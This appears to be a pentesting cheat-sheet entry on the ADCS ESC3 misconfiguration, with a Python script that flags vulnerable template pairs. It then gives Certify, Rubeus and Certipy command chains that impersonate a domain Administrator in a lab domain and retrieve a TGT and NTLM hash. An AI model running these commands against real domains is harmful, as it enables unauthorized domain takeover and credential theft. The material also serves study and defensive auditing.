ESC3
Unlike ESC1 and ESC2, this method requires two certificate templates with the following requirements:
- First template (the enrollment agent template)
  - Certificate Request Agent EKU (OID 1.3.6.1.4.1.311.20.2.1)
  - No manager approval and no authorized signatures required, so a plain enrollment succeeds
- Second template (the target template)
  - Client Authentication EKU
  - Application Policy Issuance Requirement with Authorized Signatures Required enabled and set to 1, and the application policy set to Certificate Request Agent
And, of course, a user with enrollment rights on both templates.
In the context of ADCS, the Application Policy issuance requirement defines additional constraints that must be met before the CA issues a certificate from a template. With Authorized Signatures Required set to 1 and the application policy set to Certificate Request Agent, the CA only issues from that template when the request is co-signed by a certificate that carries the Certificate Request Agent EKU, i.e. an enrollment agent certificate. The weakness is that the signature says nothing about the subject of the request: whoever holds an agent certificate from the first template can sign a request for any other user, including a domain administrator, and the resulting client authentication certificate can then be used to obtain a TGT via PKINIT. One caveat: the CA can additionally restrict which enrollment agents may enroll on behalf of whom and for which templates; if such restrictions are configured on the CA, the attack is limited to the permitted combinations.
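The following is an added example, not code from the original page or from Certify/Certipy: it applies the two-template ESC3 conditions above to certificate template records using the real LDAP attribute names of pKICertificateTemplate objects (pKIExtendedKeyUsage, msPKI-RA-Signature, msPKI-RA-Application-Policies, msPKI-Enrollment-Flag). The template records, the template names and the SIDs are constructed for the example; in a real assessment they would come from the Certificate Templates container in the Configuration partition, with the nTSecurityDescriptor already resolved to the SIDs holding the Certificate-Enrollment extended right.

```python
"""Flag ESC3 template pairs from certificate-template attributes (added example)."""
from dataclasses import dataclass, field

# EKU / application-policy OIDs
CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"   # Certificate Request Agent
CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"               # Client Authentication
ANY_PURPOSE = "2.5.29.37.0"                     # Any Purpose (covers both)

# msPKI-Enrollment-Flag bit: CT_FLAG_PEND_ALL_REQUESTS (CA manager approval)
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# Well-known SIDs used in the constructed ACLs below
AUTHENTICATED_USERS = "S-1-5-11"
BUILTIN_ADMINISTRATORS = "S-1-5-32-544"


@dataclass
class Template:
    """Subset of a pKICertificateTemplate object relevant to ESC3."""
    name: str                                          # cn
    ekus: list                                         # pKIExtendedKeyUsage
    signatures_required: int = 0                       # msPKI-RA-Signature
    # msPKI-RA-Application-Policies, assumed already split into a list of OIDs
    # (v3+ templates store it as a packed string that needs parsing first)
    app_policies: list = field(default_factory=list)
    enrollment_flag: int = 0                           # msPKI-Enrollment-Flag
    # SIDs granted the Certificate-Enrollment extended right
    # (0e10c968-78fb-11d1-a9c7-0000f80367c1); resolving the ACEs to this set
    # is assumed to be done by the caller.
    enroll_sids: set = field(default_factory=set)


def _has_eku(t, oid):
    # An empty pKIExtendedKeyUsage or Any Purpose satisfies every EKU check
    return not t.ekus or ANY_PURPOSE in t.ekus or oid in t.ekus


def _enrollable(t, sids):
    if t.enrollment_flag & CT_FLAG_PEND_ALL_REQUESTS:
        return False  # manager approval blocks unattended issuance
    return bool(t.enroll_sids & sids)


def is_agent_template(t, sids):
    """First template: Certificate Request Agent EKU, no signatures, enrollable."""
    return (_has_eku(t, CERT_REQUEST_AGENT)
            and t.signatures_required == 0
            and _enrollable(t, sids))


def is_agent_signed_client_auth_template(t, sids):
    """Second template: client auth, exactly one Certificate Request Agent signature."""
    return (_has_eku(t, CLIENT_AUTH)
            and t.signatures_required == 1
            and CERT_REQUEST_AGENT in t.app_policies
            and _enrollable(t, sids))


def find_esc3_pairs(templates, sids):
    """Return (agent template, target template) name pairs usable by a principal holding `sids`.

    Enrollment-agent restrictions configured on the CA itself are not visible
    in template objects and are not checked here.
    """
    agents = [t for t in templates if is_agent_template(t, sids)]
    targets = [t for t in templates if is_agent_signed_client_auth_template(t, sids)]
    return [(a.name, b.name) for a in agents for b in targets]


# Constructed sample records, not taken from a real directory
SAMPLE_TEMPLATES = [
    Template("Template3", [CERT_REQUEST_AGENT], enroll_sids={AUTHENTICATED_USERS}),
    Template("ESC3-Target", [CLIENT_AUTH], signatures_required=1,
             app_policies=[CERT_REQUEST_AGENT], enroll_sids={AUTHENTICATED_USERS}),
    # Client auth without a signature requirement: not the ESC3 second template
    Template("User", [CLIENT_AUTH, "1.3.6.1.5.5.7.3.4"], enroll_sids={AUTHENTICATED_USERS}),
    # Agent EKU but manager approval: unattended enrollment fails
    Template("Approved-Agent", [CERT_REQUEST_AGENT],
             enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS, enroll_sids={AUTHENTICATED_USERS}),
    # Correct shape, but only administrators may enroll
    Template("Admin-Target", [CLIENT_AUTH], signatures_required=1,
             app_policies=[CERT_REQUEST_AGENT], enroll_sids={BUILTIN_ADMINISTRATORS}),
]
# Token SIDs of a constructed low-privileged domain user
LOW_PRIV_SIDS = {AUTHENTICATED_USERS, "S-1-5-21-1004336348-1177238915-682003330-1105"}

if __name__ == "__main__":
    for agent, target in find_esc3_pairs(SAMPLE_TEMPLATES, LOW_PRIV_SIDS):
        print(f"ESC3: enroll in {agent}, then request {target} on behalf of any user")
```

Run against the sample records, only the Template3 / ESC3-Target pair is reported: the User template is excluded because it needs no agent signature (that is the ESC1-style path, not ESC3), the approval-gated agent template is excluded, and the administrator-only target is excluded for a low-privileged enrollee.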
Windows
Requesting an enrollment agent certificate from the first template
PS> .\Certify.exe request /ca:DC.minions.com\MINIONS-DC-CA /template:Template3
Convert the returned PEM (private key and certificate) into a PFX that Certify can use as the signing certificate
PS> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Request a certificate from the second (client authentication) template on behalf of the Administrator, signing the request with the agent certificate (substitute the name of the second template for ClientAuthTemplate)
PS> .\Certify.exe request /ca:DC.minions.com\MINIONS-DC-CA /template:ClientAuthTemplate /onbehalfof:minions\Administrator /enrollcert:cert.pfx /enrollcertpw:<pfx password>
Convert the returned certificate the same way, saving the PEM as admin.pem first
PS> openssl pkcs12 -in admin.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out admin.pfx
Request a TGT as the Administrator with the resulting certificate (PKINIT); /getcredentials additionally retrieves the account's NTLM hash
PS> .\Rubeus.exe asktgt /user:Administrator /domain:minions.com /certificate:admin.pfx /password:<pfx password> /getcredentials
Linux
Requesting an enrollment agent certificate from the first template (Certipy saves it as user1.pfx)
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca MINIONS-DC-CA -target DC.minions.com -template 'Template3'
Requesting a certificate from the second (client authentication) template on behalf of the Administrator, signed with the agent certificate (substitute the name of the second template for ClientAuthTemplate; Certipy saves the result as administrator.pfx)
bob$ certipy req -u 'user1@minions.com' -p 'password1' -ca MINIONS-DC-CA -target DC.minions.com -template 'ClientAuthTemplate' -on-behalf-of 'minions\administrator' -pfx user1.pfx
The resulting administrator.pfx is then used with certipy auth to obtain a TGT and the NTLM hash, matching the Rubeus step on Windows.